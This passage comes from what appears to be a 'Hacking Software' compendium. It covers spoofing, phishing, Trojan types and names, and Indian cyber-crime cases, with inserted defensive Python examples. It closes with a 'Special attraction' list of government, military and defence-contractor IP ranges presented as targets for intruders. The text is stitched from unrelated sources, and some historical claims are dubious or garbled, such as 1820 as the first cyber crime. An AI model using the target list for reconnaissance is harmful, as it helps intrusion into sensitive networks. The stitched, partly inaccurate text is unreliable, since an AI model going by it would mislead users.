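    ok, bad = filter_packets(SAMPLE_PACKETS)
    print("accepted:", ok)
    print("dropped as spoofed:", bad)
```

The longest-prefix rule matters: the catch-all 0.0.0.0/0 on the Internet interface must never win over a more specific internal prefix, otherwise an internal address arriving from outside would be accepted.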

URL spoofing and phishing

Another kind of spoofing is "webpage spoofing", also known as phishing. In this attack a legitimate web page, such as a bank's site, is reproduced in look and feel on another server under the attacker's control. The intent is to fool users into thinking they are connected to a trusted site, for instance to harvest user names and passwords. This attack is often performed with the aid of URL spoofing, which exploits web browser bugs to display an incorrect URL in the browser's location bar, or with DNS cache poisoning, which directs the user away from the legitimate site to the fake one. Once the user enters a password, the attack code reports a password error and then redirects the user back to the legitimate site, so the victim rarely notices that anything was wrong.

Referer spoofing

Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login) pages. This is enforced by checking the Referer header of the HTTP request. The Referer header, however, is set by the client and can be changed freely (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.
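An added example, not from the original article, showing why the Referer check is weak and what to use instead. The first gate trusts the Referer header, so a client that simply types an approved value gets in. The hardened gate ignores Referer and requires a token that the real login page issues after authentication: the user name, an expiry and an HMAC-SHA256 over both, which only the holder of the server secret can compute. The host example.test, the header name X-Access-Token, the secret and the sample requests are all constructed for the example.

```python
import hashlib
import hmac
from typing import Dict

APPROVED_REFERERS = ("https://example.test/login", "https://example.test/members")

# Server-side secret for the hardened variant (constructed for this example).
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"
TOKEN_HEADER = "X-Access-Token"  # assumed header name, not a standard one


def allowed_by_referer(headers: Dict[str, str]) -> bool:
    """The weak gate from the text: trust whatever Referer the client sends."""
    referer = headers.get("Referer", "")
    return any(referer.startswith(prefix) for prefix in APPROVED_REFERERS)


def issue_access_token(user: str, now: int, ttl: int = 3600) -> str:
    """Issued by the real login page after authentication: user, expiry, and an
    HMAC-SHA256 over both that only the holder of SERVER_SECRET can produce."""
    expiry = now + ttl
    tag = hmac.new(SERVER_SECRET, f"{user}|{expiry}".encode(), hashlib.sha256).hexdigest()
    return f"{user}|{expiry}|{tag}"


def allowed_by_token(headers: Dict[str, str], now: int) -> bool:
    """Hardened gate: Referer is ignored; the client must present a valid,
    unexpired token it could only have obtained from the login page."""
    parts = headers.get(TOKEN_HEADER, "").split("|")
    if len(parts) != 3:
        return False
    user, expiry, tag = parts
    if not expiry.isdigit() or int(expiry) < now:
        return False
    expected = hmac.new(SERVER_SECRET, f"{user}|{expiry}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)  # constant-time comparison


# Constructed requests: a visitor who really logged in, a client that merely
# typed a plausible Referer, and one that also guessed at a token.
NOW = 1_700_000_000
LEGIT = {"Referer": "https://example.test/login",
         TOKEN_HEADER: issue_access_token("alice", NOW)}
FORGED_REFERER = {"Referer": "https://example.test/login"}
FORGED_TOKEN = {"Referer": "https://example.test/login",
                TOKEN_HEADER: "alice|1700003600|" + "0" * 64}

if __name__ == "__main__":
    for label, req in (("legit", LEGIT), ("forged referer", FORGED_REFERER),
                       ("forged token", FORGED_TOKEN)):
        print(f"{label:15} referer-check={allowed_by_referer(req)} "
              f"token-check={allowed_by_token(req, NOW)}")
```

Any header the browser sends is under the client's control, so a Referer check can at most deter casual deep-linking; authorization has to rest on something the server issued and can verify, as the token variant does.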

Poisoning of file-sharing networks

"Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks, to discourage downloading from these sources.

Caller ID spoofing

In public telephone networks it has long been possible to find out who is calling by looking at the Caller ID information transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and with VoIP. Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity and present false names and numbers, which can of course be used to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can reach any phone on the planet, which makes Caller ID information next to useless as proof of who is calling. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country from the receiver, which makes it very difficult to have a legal framework to control those who use fake Caller IDs as part of a scam.


Trojan horse

Example of a simple Trojan horse

A simple example of a Trojan horse would be a program named "waterfalls.scr" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the victim's computer.

Types of Trojan horses

Trojan horses are almost always designed to do something harmful, although a few are merely nuisances. They are classified by how they breach systems and by the damage they cause. The main types of Trojan horse are:

• Remote access Trojans
• Data-sending Trojans
• Destructive Trojans
• Proxy Trojans
• FTP Trojans
• Security software disabler Trojans
• Denial-of-service (DoS) Trojans
• URL Trojans

Some examples of what a Trojan horse may do are:

• erasing or overwriting data on a computer;
• encrypting files in a cryptoviral extortion attack;
• corrupting files in a subtle way;
• uploading and downloading files;
• allowing remote access to the victim's computer (a remote access or remote administration tool, RAT);
• spreading other malware, such as viruses; in this case the Trojan horse is called a "dropper" or "vector";
• setting up networks of zombie computers in order to launch DDoS attacks or send spam;
• spying on the user of a computer and covertly reporting data such as browsing habits to other people (see spyware);
• taking screenshots;
• logging keystrokes to steal information such as passwords and credit card numbers (a keylogger);
• phishing for bank or other account details, which can then be used for criminal activities;
• installing a backdoor on a computer system;
• opening and closing the CD-ROM tray;
• harvesting e-mail addresses and using them for spam;
• restarting the computer whenever the infected program is started.

Time bombs and logic bombs

"Time bombs" and "logic bombs" are types of Trojan horse. Time bombs activate on particular dates and/or times; logic bombs activate when certain conditions are met on the computer.


Droppers

Droppers perform two tasks at once. A dropper performs a legitimate task but, at the same time, also installs a computer virus or a computer worm on the system or disk.

Precautions against Trojan horses

Trojan horses can be protected against largely through end-user awareness. A Trojan horse can cause a great deal of damage to a personal computer, and even more to a business, particularly a small business that usually does not have the same protection capabilities as a large one. Because a Trojan horse is disguised as something legitimate, it is harder to protect yourself or your company from it, but there are things you can do.

Trojan horses are most commonly spread through e-mail, much like other common malware; the difference is that a Trojan horse relies on the user being persuaded to run it. The best ways to protect yourself and your company from Trojan horses are as follows:

1. If you receive e-mail from someone you do not know, or receive an unexpected attachment, never open it right away; confirm the source first. Attackers can steal address books, so e-mail from someone you know is not necessarily safe.

2. When setting up your e-mail client, make sure attachments do not open automatically. Some e-mail clients come with an anti-virus scanner that checks attachments before they are opened. If yours does not, purchase one or download a free one.

3. Make sure your computer has an anti-virus program and update it regularly. If your anti-virus program has an auto-update option, turn it on; that way you remain protected even if you forget to update the software yourself.

4. Operating system vendors publish patches to protect their users from certain threats, including Trojan horses. Software developers like Microsoft offer patches that, in a sense, "close the hole" that a Trojan horse or other malware would use to get into your system. If you keep your system updated with these patches, your computer is kept much safer.

5. Avoid using peer-to-peer (P2P) file-sharing networks like Kazaa, Limewire, Ares or Gnutella, because they are generally unprotected and Trojan horses spread through them especially easily. Some of these programs offer some virus protection, but it is often not strong enough. If you insist on using P2P, do not download files that claim to be "rare" songs, books, movies, pictures and so on.

Besides these sensible precautions, one can also install anti-Trojan software, some of which is offered free.

Methods of infection

The majority of Trojan horse infections occur because the user was tricked into running an infected program. This is why it is advised not to open unexpected attachments on e-mails: the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a Trojan or worm. The infected program does not have to arrive via e-mail, though; it can be sent to you in an instant message, downloaded from a website or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.

Websites: You can be infected by visiting a rogue website.

E-mail: If you use Microsoft Outlook, you are vulnerable to many of the same problems that Internet Explorer has, even if you do not use IE directly, because older versions of Outlook render HTML mail with Internet Explorer's engine.

Open ports: Computers running their own servers (HTTP, FTP or SMTP, for example), allowing Windows file sharing, or running programs that provide file-sharing capabilities such as instant messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services open network ports, giving attackers a means of interacting with them from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.

A firewall may be used to limit access to open ports. Firewalls are widely used in practice and help to mitigate the problem of remote Trojan insertion via open ports, but they are not an impenetrable solution either.

Some modern Trojans arrive through instant messengers as a very important-looking message. The executable they carry is named the same as, or very similar to, a Windows system process such as Svchost.exe so that it does not stand out in the process list. Some of these look-alike names are:

• Svchost32.exe
• Svhost.exe
• back.exe
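An added example, not from the original text, of the check a defender would run against a process listing to catch the look-alike names above: a name that is not a Windows system process but sits within a small edit distance of one is flagged, and so is a genuine system process name that is running from the wrong directory. The reference table of system processes and their paths, the similarity cutoff and the sample listing are constructed assumptions for this example.

```python
import difflib
from typing import Dict, Iterable, List, Tuple

# Reference table (constructed for the example): legitimate Windows system
# process names and the directory each is expected to run from.
KNOWN_SYSTEM_PROCESSES: Dict[str, str] = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}

# difflib similarity at or above this value roughly means one or two inserted,
# deleted or swapped characters for names of this length; tune it on your own
# process inventory (assumed threshold, not a standard).
LOOKALIKE_CUTOFF = 0.8


def classify_process(name: str, path: str) -> str:
    """Return 'ok', 'lookalike' or 'wrong-path' for one running process.

    lookalike : not a known system process name, but within a small edit
                distance of one (Svhost.exe, Svchost32.exe, ...).
    wrong-path: exactly a system process name, but running from elsewhere.
    """
    lname, lpath = name.lower(), path.lower().rstrip("\\")
    if lname in KNOWN_SYSTEM_PROCESSES:
        return "ok" if lpath == KNOWN_SYSTEM_PROCESSES[lname] else "wrong-path"
    close = difflib.get_close_matches(lname, KNOWN_SYSTEM_PROCESSES, n=1, cutoff=LOOKALIKE_CUTOFF)
    return "lookalike" if close else "ok"


def scan(processes: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Run the classifier over (name, path) pairs and return the suspicious ones."""
    findings = []
    for name, path in processes:
        verdict = classify_process(name, path)
        if verdict != "ok":
            findings.append((name, path, verdict))
    return findings


# Constructed process listing containing the look-alikes named in the text plus
# a genuine svchost.exe name launched from a user profile directory.
SAMPLE_PROCESSES = [
    ("svchost.exe", r"C:\Windows\System32"),
    ("Svchost32.exe", r"C:\Users\victim\AppData\Local\Temp"),
    ("Svhost.exe", r"C:\Users\victim\AppData\Local\Temp"),
    ("back.exe", r"C:\Users\victim\AppData\Local\Temp"),
    ("svchost.exe", r"C:\Users\victim\AppData\Roaming"),
    ("explorer.exe", r"C:\Windows"),
]

if __name__ == "__main__":
    for name, path, verdict in scan(SAMPLE_PROCESSES):
        print(f"{verdict:10} {name:15} {path}")
```

Note what the name heuristic misses: back.exe resembles no system process and passes, which is why a real check combines name similarity with path, publisher signature and parent-process checks rather than relying on any one of them.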


Well-known trojan horses

• Back Orifice

• Back Orifice 2000

• NetBus

• SubSeven

• Downloader-EV

• Pest Trap

• AIDS

• Beast Trojan

• Bifrose ksv

• Insurrection

• Optix Pro

• Poison Ivy

• ProRat

• Sub7

• EGABTR

• RemoteHAK

• A-311 Death

• A4zeta

• Abacab

• Acessor

• AcidBattery

• Acid Drop

• AcidHead

• Acid Kor

• Acidsena

• AcidShivers

• Acid Trojan Horse

• AckCmd

• Acojonaor


• Acropolis

• Admin.Troj.Kikzyurarse

• Advertiser Bot

• AeonwindDoll

• Afcore

• A-FTP

• AF

• Agent 40421

• AH

• Aibolit

• AIMaster

• AIM Filter

• AimFrame

• aim P

• Aim Password Stealer

• AIM Pws

• AimRat

• AIM Robber

• AIM Spy

• AIMVision

• AIR

• AirBot

• Akosch

• Aladino

• Al-Bareki

• Alcatraz

• Alerter

• AlexMessoMalex

• Alicia

• Alien Hacker

• Alien Spy

• Almaster

• Almetyevsk

• Almq


• Alex

• Alofin

• Alop

• Alph

• AlphaDog

• Alvgus

• Amanda

• Amiboide Uploader

• Ambush

• AmigaAnywhere

• Amitis

• Amoeba

• AMRC

• AMS

• Anal FTP

• Anal Ra

• AnarchoIntruder

• Andromeda

• A New Trojan

• Angelfire

• AngelShell

• Annoy Toys

• Anthena

• Anti Danger

• Anti-Denial

• AntiMks

• AntiPC

• AntiLamer Backdoor

• Anti MSN

• Antylamus

• AolAdmin

• Apdoor

• Aphex's FTP

• Aphex's Remote Packet Sniffer


• Aphex tunneld 2.0

• AppServ

• APRE

• Aqua

• Arcanum

• Area Control

• Ares Invader

• Armageddon

• arplhmd

• Arranca

• Arsd

• Artic

• Arturik

• AsbMay

• A.S.H.

• Ashley

• Ass4ss1n

• Assasin

• Asylum

• Atentator

• A-Trojan

• Attack FTP

• Atwinda

• AudioDoor

• Autocrat

• AutoPWN

• Autograph

• AutoSpY

• Avanzado

• Avone

• Ayan Bilisim

• Azrael

• BD Blade runner 0.80a


• Crazy Daisy

• Connect4 Rituall33

• Donald Dick

• Flatley Trojan

• Theef

• Twelve Tricks


Introduction to Cyber Crime

The first recorded cyber crime took place in the year 1820! That is not surprising considering that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. The era of modern computers, however, began with the analytical engine of Charles Babbage.

In 1820, Joseph-Marie Jacquard, a textile manufacturer in France, produced the loom. This device allowed the repetition of a series of steps in the weaving of special fabrics. This resulted in a fear amongst Jacquard's employees that their traditional employment and livelihood were being threatened. They committed acts of sabotage to discourage Jacquard from further use of the new technology. This is the first recorded cyber crime!

Today computers have come a long way, with neural networks and nano-computing promising to turn every atom in a glass of water into a computer capable of performing a billion operations per second.

Cyber crime is an evil having its origin in the growing dependence on computers in modern life. In a day and age when everything from microwave ovens and refrigerators to nuclear power plants is being run on computers, cyber crime has assumed rather sinister implications. Major cyber crimes in the recent past include the Citibank rip-off, in which US $10 million was fraudulently transferred out of the bank and into a bank account in Switzerland. A Russian hacker group led by Vladimir Levin, a renowned hacker, perpetrated the attack. The group compromised the bank's security systems. Levin was allegedly using his office computer at AO Saturn, a computer firm in St. Petersburg, Russia, to break into Citibank computers. He was finally arrested at Heathrow Airport on his way to Switzerland.


Defining Cyber Crime

At the outset, let us define "cyber crime" and differentiate it from conventional crime. Computer crime can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also given birth to a gamut of new-age crimes that are addressed by the Information Technology Act, 2000. Defining cyber crimes as "acts that are punishable by the Information Technology Act" would be unsuitable, as the Indian Penal Code also covers many cyber crimes, such as e-mail spoofing, cyber defamation and sending threatening e-mails. A simple yet sturdy definition of cyber crime would be "unlawful acts wherein the computer is either a tool or a target or both". Let us examine the acts wherein the computer is a tool for an unlawful act. This kind of activity usually involves a modification of a conventional crime by using computers. Some examples are:

Financial crimes

This would include cheating, credit card fraud, money laundering etc. To cite a recent case, a website offered to sell Alphonso mangoes at a throwaway price. Distrusting such a transaction, very few people responded or supplied the website with their credit card numbers. These people were actually sent the Alphonso mangoes. Word about this website then spread like wildfire, and thousands of people from all over the country ordered mangoes by providing their credit card numbers. The owners of what was later proven to be a bogus website then fled with the numerous credit card numbers and proceeded to spend huge amounts of money, much to the chagrin of the card owners.

Cyber pornography

This would include pornographic websites; pornographic magazines produced using computers (to publish and print the material); and the Internet (to download and transmit pornographic pictures, photos, writings etc.). Recent Indian incidents revolving around cyber pornography include the Air Force Balbharati School case. A student of the Air Force Balbharati School, Delhi, was teased by all his classmates for having a pockmarked face. Tired of the cruel jokes, he decided to get back at his tormentors. He scanned photographs of his classmates and teachers, morphed them with nude photographs and put them up on a website that he uploaded to a free web hosting service. It was only after the father of one of the girls featured on the website objected and lodged a complaint with the police that any action was taken.

In another incident, in Mumbai, a Swiss couple would gather slum children and force them to pose for obscene photographs. They would then upload these photographs to websites specially designed for paedophiles. The Mumbai police arrested the couple for pornography.

Sale of illegal articles

This would include the sale of narcotics, weapons, wildlife etc. by posting information on websites, auction websites and bulletin boards, or simply by using e-mail communication. For example, many auction sites, even in India, are believed to be selling cocaine in the name of "honey".

Online gambling

There are millions of websites, all hosted on servers abroad, that offer online gambling. In fact, it is believed that many of these websites are actually fronts for money laundering.


Intellectual property crimes

These include software piracy, copyright infringement, trademark violations, theft of computer source code etc.

Email spoofing

A spoofed e-mail is one that appears to originate from one source but has actually been sent from another. For example, Pooja has the e-mail address [email protected]. Her enemy, Sameer, spoofs her e-mail address and sends obscene messages to all her acquaintances. Since the e-mails appear to have originated from Pooja, her friends could take offence and relationships could be spoiled for life. E-mail spoofing can also cause monetary damage. In an American case, a teenager made millions of dollars by spreading false information about certain companies whose shares he had sold short. This misinformation was spread by sending spoofed e-mails, purportedly from news agencies like Reuters, to share brokers and investors, who were informed that the companies were doing very badly. Even after the truth came out, the values of the shares did not return to their earlier levels and thousands of investors lost a lot of money.
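Added example, not part of the original text: how a receiving mail system can tell that a message's visible From address does not line up with the route the message actually took. The From header is whatever the sender typed; the Return-Path (the envelope sender, recorded at delivery) and the outermost Received header are written by the receiving infrastructure, not the sender. Mail receivers do this formally with SPF, DKIM and DMARC alignment; the code below shows only the alignment comparison itself, on two constructed raw messages with made-up domains.

```python
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

# Constructed raw messages with made-up domains. In the spoofed one the From
# header names Pooja's provider, but the envelope sender (Return-Path) and the
# outermost Received hop, both written by the receiving side, name another host.
SPOOFED_RAW = b"""Return-Path: <bounce@attacker-mail.example>
Received: from mx.attacker-mail.example (mx.attacker-mail.example [198.51.100.23])
\tby mail.recipient.example with ESMTP id abc123
From: Pooja <pooja@friendly-provider.example>
To: friend@recipient.example
Subject: hello

body
"""

LEGIT_RAW = b"""Return-Path: <pooja@friendly-provider.example>
Received: from smtp.friendly-provider.example (smtp.friendly-provider.example [203.0.113.9])
\tby mail.recipient.example with ESMTP id def456
From: Pooja <pooja@friendly-provider.example>
To: friend@recipient.example
Subject: hello

body
"""


def _domain(header_value) -> str:
    """Lower-cased domain part of an address header, or '' if there is none."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def _first_hop(msg) -> str:
    """Host named in the outermost (most recently added) Received header."""
    received = msg.get_all("Received") or []
    if not received:
        return ""
    tokens = str(received[0]).split()
    return tokens[1].lower() if len(tokens) >= 2 and tokens[0].lower() == "from" else ""


def sender_alignment(raw: bytes) -> dict:
    """Compare what the user sees (From) with what the transport recorded."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_domain = _domain(msg["From"])
    return_path_domain = _domain(msg["Return-Path"])
    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "received_from": _first_hop(msg),
        # Aligned only when the visible sender domain and the envelope sender
        # domain agree; a mismatch is the classic signature of a spoofed From.
        "aligned": bool(from_domain) and from_domain == return_path_domain,
    }


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_RAW), ("legitimate", LEGIT_RAW)):
        print(label, sender_alignment(raw))
```

Treat a mismatch as a signal rather than a verdict: mailing lists and forwarding services also break this alignment, which is why DMARC permits relaxed alignment and why real deployments combine it with SPF and DKIM results.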

Forgery

Counterfeit currency notes, postage and revenue stamps, mark sheets etc. can be forged using sophisticated computers, printers and scanners. Outside many colleges across India one finds touts soliciting the sale of fake mark sheets or even certificates. These are made using computers and high-quality scanners and printers. In fact, this has become a booming business involving thousands of rupees being given to student gangs in exchange for these bogus but authentic-looking certificates.

Cyber defamation

This occurs when defamation takes place with the help of computers and/or the Internet, e.g. someone publishes defamatory matter about a person on a website or sends e-mails containing defamatory information to all of that person's friends.

In a recent occurrence, Surekha (names have been changed), a young girl, was about to be married to Suraj. She was really pleased because, despite it being an arranged marriage, she had liked the boy; he had seemed open-minded and pleasant. Then one day when she met Suraj he looked worried and even a little upset, and was not really interested in talking to her. When asked, he told her that members of his family had been receiving e-mails containing malicious things about Surekha's character, some of which spoke of affairs she had had in the past. He told her that his parents were justifiably very upset and were considering breaking off the engagement. Fortunately, Suraj was able to prevail upon his parents and the other elders of his house to approach the police instead of blindly believing what was in the mails. During the investigation it was revealed that the person sending those e-mails was none other than Surekha's stepfather. He had sent them to break up the marriage, because the girl's marriage would have caused him to lose control of her property, of which he was guardian until she married.

Another famous case of cyber defamation occurred in America. All the friends and relatives of a lady were beset with obscene e-mail messages appearing to originate from her account, giving her a bad name among her friends. The lady was an activist against pornography. In reality, a group of people displeased with her views and angry with her for opposing them had decided to get back at her by these underhanded methods. In addition to sending spoofed obscene e-mails, they also put up websites maligning her character and sent e-mails to her family and friends containing matter defaming her.

Cyber stalking

The Oxford dictionary defines stalking as "pursuing stealthily". Cyber stalking involves following a person's movements across the Internet by posting messages (sometimes threatening) on the bulletin boards frequented by the victim, entering the chat rooms frequented by the victim, constantly bombarding the victim with e-mails, etc.


Index

• IP Address

• Default Router Password

• Net BIOS

• Mobile Hacking


Special attraction

Government, military and intelligence IP ranges.
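The list below mixes several notations ("6.*", "7.*.*.*", "21.", bare "128.51.0.0", and explicit "first - last" ranges). As an added example that is not part of the original document, here is a parser that normalises those forms to CIDR networks together with a longest-prefix lookup, so that an address you are about to scan or route can be checked against the list before you touch it. Reading "6.*", "21." and "128.51.0.0" as /8, /8 and /16 is an assumption about the list's notation; the lines in SAMPLE_LINES are copied from the list in the same formats.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

Entry = Tuple[ipaddress.IPv4Network, str]

# Constructed excerpt copied in the notations the list below actually uses.
SAMPLE_LINES = """
RANGE 6
6.* - Army Information Systems Center
7.*.*.* Defense Information Systems Agency, VA
21. - US Defense Information Systems Agency
24.198.*.*
128.51.0.0 Department of Defense
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
134.52.*.* Boeing Corporation
""".strip().splitlines()

_QUAD = r"\d{1,3}(?:\.\d{1,3}){3}"
RANGE_RE = re.compile(rf"^({_QUAD})\s*-\s*({_QUAD})\s*(.*)$")
TOKEN_RE = re.compile(r"^([\d.*]+)\s*(?:-\s*)?(.*)$")


def parse_entry(line: str) -> Optional[Entry]:
    """One list line -> (network, description); None for blank or RANGE heading lines."""
    line = line.strip()
    if not line or line.upper().startswith("RANGE "):
        return None
    m = RANGE_RE.match(line)
    if m:  # explicit "first - last" form
        first, last, desc = m.groups()
        nets = list(ipaddress.summarize_address_range(
            ipaddress.ip_address(first), ipaddress.ip_address(last)))
        if len(nets) != 1:
            raise ValueError(f"range is not one CIDR block: {line}")
        return nets[0], desc.strip()
    m = TOKEN_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised line: {line}")
    token, desc = m.groups()
    octets = [int(o) for o in token.split(".") if o.isdigit()]
    # Assumption about the list's notation: "6.*", "21." and "128.51.0.0" all
    # mean "everything under the leading non-zero octets", i.e. /8, /8 and /16.
    while len(octets) > 1 and octets[-1] == 0:
        octets.pop()
    if not 1 <= len(octets) <= 4 or any(o > 255 for o in octets):
        raise ValueError(f"bad address token: {token}")
    base = ".".join(str(o) for o in octets + [0] * (4 - len(octets)))
    return ipaddress.ip_network(f"{base}/{8 * len(octets)}"), desc.strip()


def load(lines) -> List[Entry]:
    return [entry for entry in map(parse_entry, lines) if entry is not None]


def lookup(ip: str, entries: List[Entry]) -> Optional[Entry]:
    """Longest-prefix match of ip against the parsed ranges; None if not listed."""
    addr = ipaddress.ip_address(ip)
    hits = [entry for entry in entries if addr in entry[0]]
    return max(hits, key=lambda entry: entry[0].prefixlen) if hits else None


if __name__ == "__main__":
    table = load(SAMPLE_LINES)
    for net, desc in table:
        print(f"{str(net):20} {desc}")
    for probe in ("128.98.4.5", "21.7.7.7", "192.0.2.1"):
        print(probe, "->", lookup(probe, table))
```

Feed the whole list through load() and run every target of an engagement through lookup() as a scope check; a hit means the address belongs to one of the organisations named here, regardless of what the target's hostname suggests.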

RANGE 6

6.* - Army Information Systems Center

RANGE 7

7.*.*.* Defense Information Systems Agency, VA

RANGE 11

11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC

RANGE 21

21.* - US Defense Information Systems Agency

RANGE 22

22.* - Defense Information Systems Agency

RANGE 24

24.198.*.*

RANGE 25

25.*.*.* Royal Signals and Radar Establishment, UK

RANGE 26

26.* - Defense Information Systems Agency

RANGE 29

29.* - Defense Information Systems Agency

RANGE 30

30.* - Defense Information Systems Agency


RANGE 49

49.* - Joint Tactical Command

RANGE 50

50.* - Joint Tactical Command

RANGE 55

55.* - Army National Guard Bureau

RANGE 128

128.51.0.0 Department of Defense

128.56.0.0 U.S. Naval Academy

128.60.0.0 Naval Research Laboratory

128.63.0.0 Army Ballistics Research Laboratory

128.80.0.0 Army Communications Electronics Command

128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency

128.102.0.0 NASA Ames Research Center

128.149.0.0 NASA Headquarters

128.154.0.0 NASA Wallops Flight Facility

128.155.0.0 NASA Langley Research Center

128.156.0.0 NASA Lewis Network Control Center

128.157.0.0 NASA Johnson Space Center

128.158.0.0 NASA Ames Research Center

128.159.0.0 NASA Ames Research Center

128.160.0.0 Naval Research Laboratory

128.161.0.0 NASA Ames Research Center

128.183.0.0 NASA Goddard Space Flight Center

128.190.0.0 Army Belvoir Research and Development Center

128.202.0.0 50th Space Wing

128.216.0.0 MacDill Air Force Base

128.236.0.0 U.S. Air Force Academy

RANGE 129

129.23.0.0 Strategic Defense Initiative Organization

129.29.0.0 United States Military Academy

129.50.0.0 NASA Marshall Space Flight Center

129.51.0.0 Patrick Air Force Base

129.52.0.0 Wright-Patterson Air Force Base

129.165.0.0 NASA Goddard Space Flight Center

129.166.0.0 NASA - John F. Kennedy Space Center

129.167.0.0 NASA Marshall Space Flight Center

129.168.0.0 NASA Lewis Research Center

129.190.0.0 Naval Underwater Systems Center

129.198.0.0 Air Force Flight Test Center

129.209.0.0 Army Ballistics Research Laboratory

129.229.0.0 U.S. Army Corps of Engineers

129.251.0.0 United States Air Force Academy

RANGE 130

130.40.0.0 NASA Johnson Space Center

130.90.0.0 Mather Air Force Base

130.109.0.0 Naval Coastal Systems Center

130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity

130.124.0.0 Honeywell Defense Systems Group

130.165.0.0 U.S.Army Corps of Engineers

130.167.0.0 NASA Headquarters

RANGE 131

131.6.0.0 Langley Air Force Base

131.10.0.0 Barksdale Air Force Base

131.17.0.0 Sheppard Air Force Base

131.21.0.0 Hahn Air Base

131.22.0.0 Keesler Air Force Base

131.24.0.0 6 Communications Squadron

131.25.0.0 Patrick Air Force Base

131.32.0.0 37 Communications Squadron

131.35.0.0 Fairchild Air Force Base


131.36.0.0 Yokota Air Base

131.37.0.0 Elmendorf Air Force Base

131.38.0.0 Hickam Air Force Base

131.39.0.0 354CS/SCSN

131.40.0.0 Bergstrom Air Force Base

131.44.0.0 Randolph Air Force Base

131.46.0.0 20 Communications Squadron

131.47.0.0 Andersen Air Force Base

131.50.0.0 Davis-Monthan Air Force Base

131.52.0.0 56 Communications Squadron /SCBB

131.54.0.0 Air Force Concentrator Network

131.56.0.0 Upper Heyford Air Force Base

131.58.0.0 Alconbury Royal Air Force Base

131.59.0.0 7 Communications Squadron

131.61.0.0 McConnell Air Force Base

131.62.0.0 Norton Air Force Base

131.74.0.0 Defense MegaCenter Columbus

131.84.0.0 Defense Technical Information Center

131.92.0.0 Army Information Systems Command - Aberdeen (EA)

131.105.0.0 McClellan Air Force Base

131.110.0.0 NASA/Michoud Assembly Facility

131.120.0.0 Naval Postgraduate School

131.121.0.0 United States Naval Academy

131.122.0.0 United States Naval Academy

131.176.0.0 European Space Operations Center

131.182.0.0 NASA Headquarters

131.250.0.0 Office of the Chief of Naval Research

RANGE 132

132.3.0.0 Williams Air Force Base

132.6.0.0 Ankara Air Station

132.9.0.0 28th Bomb Wing

132.10.0.0 319 Comm Sq

132.11.0.0 Hellenikon Air Base


132.12.0.0 Myrtle Beach Air Force Base

132.13.0.0 Bentwaters Royal Air Force Base

132.14.0.0 Air Force Concentrator Network

132.15.0.0 Kadena Air Base

132.16.0.0 Kunsan Air Base

132.17.0.0 Lindsey Air Station

132.18.0.0 McGuire Air Force Base

132.20.0.0 35th Communications Squadron

132.21.0.0 Plattsburgh Air Force Base

132.22.0.0 23Communications Sq

132.24.0.0 Dover Air Force Base

132.30.0.0 Lajes Air Force Base

132.31.0.0 Loring Air Force Base

132.34.0.0 Cannon Air Force Base

132.35.0.0 Altus Air Force Base

132.38.0.0 Goodfellow AFB

132.39.0.0 K.I. Sawyer Air Force Base

132.42.0.0 Spangdahlem Air Force Base

132.43.0.0 Zweibruchen Air Force Base

132.45.0.0 Chanute Air Force Base

132.46.0.0 Columbus Air Force Base

132.48.0.0 Laughlin Air Force Base

132.50.0.0 Reese Air Force Base

132.52.0.0 Vance Air Force Base

132.54.0.0 Langley AFB

132.55.0.0 Torrejon Air Force Base

132.57.0.0 Castle Air Force Base

132.58.0.0 Nellis Air Force Base

132.59.0.0 24Comm Squadron\SCSNA

132.61.0.0 SSG/SIN

132.79.0.0 Army National Guard Bureau

132.82.0.0 Army National Guard Bureau

132.86.0.0 National Guard Bureau

132.94.0.0 Army National Guard Bureau

73

Page 74: 6552818 Hacking Software

132.109.0.0 National Guard Bureau

132.114.0.0 Army National Guard

132.117.0.0 Army National Guard Bureau

132.122.0.0 South Carolina Army National Guard, USPFO

132.133.0.0 National Guard Bureau

132.159.0.0 Army Information Systems Command

132.193.0.0 Army Research Office

132.250.0.0 Naval Research Laboratory

RANGE 134

134.5.0.0 Lockheed Aeronautical Systems Company

134.11.0.0 The Pentagon

134.12.0.0 NASA Ames Research Center

134.51.0.0 Boeing Military Aircraft Facility

134.52.*.* Boeing Corporation

134.78.0.0 Army Information Systems Command-ATCOM

134.80.0.0 Army Information Systems Command

134.118.0.0 NASA/Johnson Space Center

134.131.0.0 Wright-Patterson Air Force Base

134.136.0.0 Wright-Patterson Air Force Base

134.164.0.0 Army Engineer Waterways Experiment Station

134.165.0.0 Headquarters Air Force Space Command

134.194.0.0 U.S. Army Aberdeen Test Center

134.205.0.0 7th Communications Group

